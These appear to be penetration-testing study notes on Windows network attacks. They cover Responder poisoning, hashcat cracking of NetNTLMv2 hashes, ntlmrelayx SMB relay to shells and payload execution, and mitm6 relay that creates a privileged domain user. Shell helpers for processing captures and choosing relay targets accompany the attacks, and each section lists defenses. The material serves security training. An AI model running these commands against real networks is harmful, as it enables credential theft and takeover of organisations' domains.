Network poisoning

Needs an event triggered by a user (a mistyped share name, a hostname that DNS cannot resolve, ...)

Explanations

  • LLMNR (Link-Local Multicast Name Resolution) is used to identify hosts when DNS fails to do so

  • Its predecessor is NBT-NS (NetBIOS Name Service); Windows still falls back to it after LLMNR

  • Key flaw: any host on the local link can answer the query, and once the victim gets an answer it authenticates to whoever answered, sending its username and an NTLMv2 challenge-response (NetNTLMv2) → when we answer the query, the victim hands us its username and password hash. Note that this is a challenge-response, not the NT hash itself: it can be cracked offline or relayed, but not used for pass-the-hash

Steps

  1. Run Responder first thing in the morning or right after lunch, because we need a lot of traffic: python Responder.py -I tun0 -rdw (-I is the capital letter i and takes the interface to listen on)

  2. An event occurs... someone types a wrong network drive name, for example, and Windows falls back to LLMNR/NBT-NS to resolve it

  3. Responder answers the query and prints the client IP, username and NTLMv2 hash; the captures are also written to its logs/ directory

  4. Crack the hash with hashcat (mode 5600 is NetNTLMv2): hashcat -m 5600 hashes.txt rockyou.txt
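Before step 4 it is worth collapsing Responder's captures to one line per account: Responder logs a new NetNTLMv2 line every time the same user trips the poisoner, and hashcat would otherwise spend time cracking the same account many times over. The following shell functions are an added example, not part of the original notes or of Responder; the Responder log path in the usage comment is an assumption and the sample captures are constructed dummies.

```shell
# Added example, not part of the original notes: collapse the NetNTLMv2
# challenge-responses Responder logs into one hashcat input with a single
# line per account. Each capture has the form
#   USER::DOMAIN:<16 hex server challenge>:<32 hex NTProofStr>:<hex blob>
set -eu

# Keep the first well-formed NetNTLMv2 line per DOMAIN\USER (case-insensitive).
# Reads capture lines on stdin, writes the deduplicated set to stdout.
dedupe_ntlmv2() {
    awk -F'::' '
        NF == 2 {
            # $1 is the user, $2 is DOMAIN:challenge:NTProofStr:blob
            n = split($2, f, ":")
            if (n != 4) next
            if (length(f[2]) != 16 || length(f[3]) != 32) next
            if ((f[2] f[3] f[4]) !~ /^[0-9a-fA-F]+$/) next
            key = tolower(f[1]) "/" tolower($1)
            if (!(key in seen)) { seen[key] = 1; print }
        }'
}

# Number of distinct accounts hashcat will actually have to crack.
count_accounts() {
    dedupe_ntlmv2 < "$1" | wc -l | tr -d ' '
}

# Constructed sample of what Responder's logs/*NTLMv2*.txt lines look like;
# the hex values are dummies, not real captures. The last line imitates
# console noise that must be ignored.
make_sample_captures() {
    cat > "$1" <<'EOF'
jdoe::CORP:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000aabbccdd
jdoe::CORP:8877665544332211:ffeeddccbbaa99887766554433221100:0101000000000000ddccbbaa
JDOE::corp:0123456789abcdef:0123456789abcdef0123456789abcdef:0101000000000000deadbeef
svc_backup::CORP:fedcba9876543210:fedcba9876543210fedcba9876543210:0101000000000000cafebabe
[SMB] NTLMv2-SSP Hash     : this line is Responder console output, not a capture
EOF
}

# Typical use (Responder's default log directory is assumed):
#   cat /usr/share/responder/logs/*NTLMv2*.txt | dedupe_ntlmv2 > hashes.txt
#   hashcat -m 5600 hashes.txt rockyou.txt
```

The key is domain plus username, lower-cased, because Responder records whatever case the client sent, and the same account routinely shows up both as CORP\jdoe and corp\JDOE. Lines that do not have exactly four colon-separated fields after the user, or whose challenge and NTProofStr are not 16 and 32 hex digits, are dropped rather than fed to hashcat.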

Defenses

Disable LLMNR and NBT-NS

To disable LLMNR: set "Turn off multicast name resolution" to Enabled under Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client in the Group Policy Editor

To disable NBT-NS: navigate to Network Connections > Network Adapter Properties > TCP/IPv4 Properties > Advanced tab > WINS tab and select "Disable NetBIOS over TCP/IP" (this is a per-adapter setting, so across a fleet push it with a DHCP scope option or a startup script rather than by hand)

If the company must use or cannot disable LLMNR/NBT-NS

The best course of action is to :

  • Require Network Access Control

  • Require strong user passwords (e.g., >14 characters in length and limit common word usage). The more complex and long the password, the harder it is for an attacker to crack the hash

SMB Relay attacks

Explanations

Instead of cracking the hashes gathered with Responder, we can relay the NTLM authentication itself to other machines and potentially gain access

Requirements :

  • SMB signing must be disabled or not required on the target (by default it is enabled but not required on workstations and member servers, and required only on domain controllers)

  • The relayed user must be a local admin on the target for ntlmrelayx's default action (dumping the local SAM hashes). The authentication also cannot be relayed back to the machine it came from, so the victim itself must not be in the target list

Steps

  1. Edit /etc/responder/Responder.conf and set SMB = Off and HTTP = Off, so Responder only poisons the name queries and leaves the authentication to ntlmrelayx

  2. Run Responder: python Responder.py -I tun0 -rdwv (notice that HTTP and SMB are now shown in red, i.e. off)

  3. Set up the relay: python ntlmrelayx.py -tf targets.txt -smb2support (targets.txt holds the IP addresses with SMB signing not required, one per line)

  4. An event occurs...

  5. WIN: ntlmrelayx relays the authentication to each target, and wherever the user is a local admin it dumps the SAM hashes by default
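Step 1 is easy to get wrong by hand (turning off HTTPS instead of HTTP, or forgetting to turn the servers back on afterwards). The functions below are an added example, not part of the original notes or of Responder: they flip the server switches in Responder.conf from the shell and let you verify the result. The config path is the one the notes use; the sample file is a constructed copy of the relevant section.

```shell
# Added example, not part of the original notes: turn Responder's own SMB and
# HTTP servers off in Responder.conf from the command line and verify the
# change, instead of hand-editing the file. /etc/responder/Responder.conf is
# the path used in the notes; pass whatever path your install uses.
set -eu

# Flip "<NAME> = On" to "<NAME> = Off" for each server name given.
# Usage: disable_responder_servers /etc/responder/Responder.conf SMB HTTP
disable_responder_servers() {
    conf=$1
    shift
    for svc in "$@"; do
        # Anchor both ends of the line so HTTP does not also match HTTPS.
        sed "s/^${svc} = On\$/${svc} = Off/" "$conf" > "${conf}.tmp"
        mv "${conf}.tmp" "$conf"
    done
}

# Print the On/Off state of one server, e.g. server_state conf SMB -> Off
server_state() {
    awk -v name="$2" '$1 == name && $2 == "=" { print $3 }' "$1"
}

# Constructed sample mirroring the [Responder Core] section of a stock
# Responder.conf (only the server switches matter here).
make_sample_conf() {
    cat > "$1" <<'EOF'
[Responder Core]

; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
EOF
}

# Before the relay:
#   disable_responder_servers /etc/responder/Responder.conf SMB HTTP
#   server_state /etc/responder/Responder.conf SMB   # expect Off
# Keep a backup of the file and restore it when the relay is done.
```

Only SMB and HTTP go off: HTTPS, LDAP and the rest stay up so that other poisoned protocols still yield captures while the relay is running.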

Discovering hosts with SMB signing disabled

nmap --script=smb2-security-mode.nse -p445 192.168.23.0/24

Hosts whose output says "Message signing enabled but not required" (or that signing is disabled) go into targets.txt; hosts reporting "enabled and required" cannot be relayed to.
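Turning that scan into targets.txt for step 3 of the relay is a small parsing job that is easy to automate. The following is an added example, not part of the original notes or of nmap: it reads nmap's normal (-oN) output and keeps only the hosts whose signing is not required. The sample scan output is constructed, using addresses from the range in the notes; rerunning the same scan after enabling SMB signing (see Defenses below) is also the quickest check that the fix landed.

```shell
# Added example, not part of the original notes: build targets.txt for
# ntlmrelayx from the output of nmap's smb2-security-mode script. The script
# prints one "Message signing ..." line per host; hosts where signing is
# enabled but not required (or disabled) are relay targets, hosts where it
# is required are dropped.
set -eu

# Read nmap normal output on stdin, print one relayable address per line.
relay_targets() {
    awk '
        # "Nmap scan report for 10.0.0.5" or "... for host.corp.local (10.0.0.5)":
        # the last word, minus parentheses, is the address.
        /^Nmap scan report for / { host = $NF; gsub(/[()]/, "", host) }
        /Message signing/ && (/not required/ || /disabled/) { print host }
    '
}

# Constructed sample of nmap -oN output for three hosts: a domain controller
# (signing required) and two workstations (signing not required).
make_sample_scan() {
    cat <<'EOF'
Nmap scan report for 192.168.23.130
Host is up (0.00050s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 192.168.23.131
Host is up (0.00041s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for ws02.protyro.local (192.168.23.132)
Host is up (0.00044s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
EOF
}

# Typical use:
#   nmap --script=smb2-security-mode.nse -p445 192.168.23.0/24 -oN scan.txt
#   relay_targets < scan.txt > targets.txt
```

Remember to remove the victim's own address from targets.txt if it shows up: the authentication cannot be relayed back to the host it came from.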

Some examples of use

SMB Shell

responder -I eth0 -rdwv

ntlmrelayx.py -tf targets.txt -smb2support -i (-i for interactive)

nc 127.0.0.1 11000 --> we are in an SMB shell (ntlmrelayx prints the port for every relayed session; the first one is 11000 and each new session gets the next port)

A few commands (# is the prompt of the interactive shell):

  • # help

  • # shares

  • # use c$

  • # ls

Execute a meterpreter shell (first create the payload with msfvenom and start a meterpreter listener)

ntlmrelayx.py -tf targets.txt -smb2support -e shell.exe

Execute a command

ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

Defenses

  • Enable SMB signing on all devices → Pro: completely stops the attack → Con: can slow down file copies (a decrease of up to 50% is commonly quoted)

  • Disable NTLM authentication on the network → Pro: completely stops the attack → Con: if Kerberos stops working, Windows falls back to NTLM

  • Account tiering → Pro: limits domain admins to specific tasks (e.g. DA accounts only log onto servers that need DA) → Con: enforcing the policy may be difficult

  • Local admin restriction → Pro: can prevent a lot of lateral movement → Con: potential increase in the number of service desk tickets

mitm6 (man in the middle for IPv6 :)

Explanations

Windows prefers IPv6 and asks for a DHCPv6 configuration even on IPv4-only networks. mitm6 answers those requests and hands the client our host as its DNS server, then spoofs WPAD so the client authenticates to us; ntlmrelayx relays that authentication to LDAP/LDAPS on a domain controller.

Resources

Follow the link and read a little: https://github.com/fox-it/mitm6

Steps

  1. Run mitm6 -d protyro.local

  2. ntlmrelayx.py -6 -t ldaps://192.168.23.130 -wh fakewpad.PROTYRO.local -l lootme

  3. Wait for a DHCPv6 request (Windows sends one at boot and renews roughly every 30 minutes)

  4. In the lootme folder, open domain_users_by_group.html in a browser (Firefox, for example)

  5. If a domain admin authenticates, ntlmrelayx creates a new privileged user for us (its name and password are printed in the ntlmrelayx output) :)

Defenses

IPv6 poisoning abuses the fact that Windows requests an IPv6 configuration even in IPv4-only environments. If you do not use IPv6 internally, the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy; disabling IPv6 entirely may have unwanted side effects. Setting the following predefined rules to Block instead of Allow prevents the attack from working:

  • (Inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPv6-In)

  • (Inbound) Core Networking - Router Advertisement (ICMPv6-In)

  • (Outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPv6-Out)

If WPAD is not used internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service.

Relaying to LDAP is stopped by LDAP signing and relaying to LDAPS by LDAP channel binding, so both must be enabled to close this path.

Consider adding administrative users to the Protected Users group or marking them as "Account is sensitive and cannot be delegated", which prevents impersonation of that user via delegation.
